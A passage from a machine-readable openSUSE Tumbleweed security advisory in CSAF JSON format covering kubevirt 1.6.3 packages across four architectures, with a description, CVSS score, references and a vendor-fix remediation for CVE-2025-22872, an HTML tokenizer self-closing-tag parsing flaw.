"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-sidecar-shim-1.6.3-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.ppc64le"
},
"product_reference": "kubevirt-sidecar-shim-1.6.3-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-sidecar-shim-1.6.3-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.s390x"
},
"product_reference": "kubevirt-sidecar-shim-1.6.3-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-sidecar-shim-1.6.3-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.x86_64"
},
"product_reference": "kubevirt-sidecar-shim-1.6.3-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-tests-1.6.3-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.aarch64"
},
"product_reference": "kubevirt-tests-1.6.3-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-tests-1.6.3-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.ppc64le"
},
"product_reference": "kubevirt-tests-1.6.3-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-tests-1.6.3-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.s390x"
},
"product_reference": "kubevirt-tests-1.6.3-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-tests-1.6.3-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.x86_64"
},
"product_reference": "kubevirt-tests-1.6.3-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-api-1.6.3-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.aarch64"
},
"product_reference": "kubevirt-virt-api-1.6.3-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-api-1.6.3-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.ppc64le"
},
"product_reference": "kubevirt-virt-api-1.6.3-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-api-1.6.3-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.s390x"
},
"product_reference": "kubevirt-virt-api-1.6.3-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-api-1.6.3-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.x86_64"
},
"product_reference": "kubevirt-virt-api-1.6.3-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-controller-1.6.3-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.aarch64"
},
"product_reference": "kubevirt-virt-controller-1.6.3-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-controller-1.6.3-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.ppc64le"
},
"product_reference": "kubevirt-virt-controller-1.6.3-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-controller-1.6.3-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.s390x"
},
"product_reference": "kubevirt-virt-controller-1.6.3-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-controller-1.6.3-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.x86_64"
},
"product_reference": "kubevirt-virt-controller-1.6.3-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-exportproxy-1.6.3-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.aarch64"
},
"product_reference": "kubevirt-virt-exportproxy-1.6.3-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-exportproxy-1.6.3-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.ppc64le"
},
"product_reference": "kubevirt-virt-exportproxy-1.6.3-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-exportproxy-1.6.3-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.s390x"
},
"product_reference": "kubevirt-virt-exportproxy-1.6.3-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-exportproxy-1.6.3-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.x86_64"
},
"product_reference": "kubevirt-virt-exportproxy-1.6.3-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-exportserver-1.6.3-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.aarch64"
},
"product_reference": "kubevirt-virt-exportserver-1.6.3-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-exportserver-1.6.3-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.ppc64le"
},
"product_reference": "kubevirt-virt-exportserver-1.6.3-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-exportserver-1.6.3-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.s390x"
},
"product_reference": "kubevirt-virt-exportserver-1.6.3-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-exportserver-1.6.3-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.x86_64"
},
"product_reference": "kubevirt-virt-exportserver-1.6.3-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-handler-1.6.3-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.aarch64"
},
"product_reference": "kubevirt-virt-handler-1.6.3-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-handler-1.6.3-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.ppc64le"
},
"product_reference": "kubevirt-virt-handler-1.6.3-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-handler-1.6.3-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.s390x"
},
"product_reference": "kubevirt-virt-handler-1.6.3-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-handler-1.6.3-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.x86_64"
},
"product_reference": "kubevirt-virt-handler-1.6.3-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-launcher-1.6.3-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.aarch64"
},
"product_reference": "kubevirt-virt-launcher-1.6.3-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-launcher-1.6.3-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.ppc64le"
},
"product_reference": "kubevirt-virt-launcher-1.6.3-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-launcher-1.6.3-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.s390x"
},
"product_reference": "kubevirt-virt-launcher-1.6.3-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-launcher-1.6.3-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.x86_64"
},
"product_reference": "kubevirt-virt-launcher-1.6.3-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-operator-1.6.3-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.aarch64"
},
"product_reference": "kubevirt-virt-operator-1.6.3-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-operator-1.6.3-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.ppc64le"
},
"product_reference": "kubevirt-virt-operator-1.6.3-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-operator-1.6.3-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.s390x"
},
"product_reference": "kubevirt-virt-operator-1.6.3-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-operator-1.6.3-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.x86_64"
},
"product_reference": "kubevirt-virt-operator-1.6.3-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virtctl-1.6.3-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.aarch64"
},
"product_reference": "kubevirt-virtctl-1.6.3-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virtctl-1.6.3-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.ppc64le"
},
"product_reference": "kubevirt-virtctl-1.6.3-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virtctl-1.6.3-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.s390x"
},
"product_reference": "kubevirt-virtctl-1.6.3-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virtctl-1.6.3-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.x86_64"
},
"product_reference": "kubevirt-virtctl-1.6.3-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "obs-service-kubevirt_containers_meta-1.6.3-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.aarch64"
},
"product_reference": "obs-service-kubevirt_containers_meta-1.6.3-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "obs-service-kubevirt_containers_meta-1.6.3-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.ppc64le"
},
"product_reference": "obs-service-kubevirt_containers_meta-1.6.3-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "obs-service-kubevirt_containers_meta-1.6.3-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.s390x"
},
"product_reference": "obs-service-kubevirt_containers_meta-1.6.3-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "obs-service-kubevirt_containers_meta-1.6.3-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.x86_64"
},
"product_reference": "obs-service-kubevirt_containers_meta-1.6.3-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-22872",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-22872"
}
],
"notes": [
{
"category": "general",
"text": "The tokenizer incorrectly interprets tags with unquoted attribute values that end with a solidus character (/) as self-closing. When directly using Tokenizer, this can result in such tags incorrectly being marked as self-closing, and when using the Parse functions, this can result in content following such tags as being placed in the wrong scope during DOM construction, but only when tags are in foreign content (e.g. \u003cmath\u003e, \u003csvg\u003e, etc contexts).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-22872",
"url": "https://www.suse.com/security/cve/CVE-2025-22872"
},
{
"category": "external",
"summary": "SUSE Bug 1241710 for CVE-2025-22872",
"url": "https://bugzilla.suse.com/1241710"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-launcher-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-operator-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virtctl-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:obs-service-kubevirt_containers_meta-1.6.3-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-tests-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-api-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-controller-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-exportproxy-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.s390x",
"openSUSE Tumbleweed:kubevirt-virt-exportserver-1.6.3-1.1.x86_64",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.aarch64",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.ppc64le",
"openSUSE Tumbleweed:kubevirt-virt-handler-1.6.3-1.1.s390x",
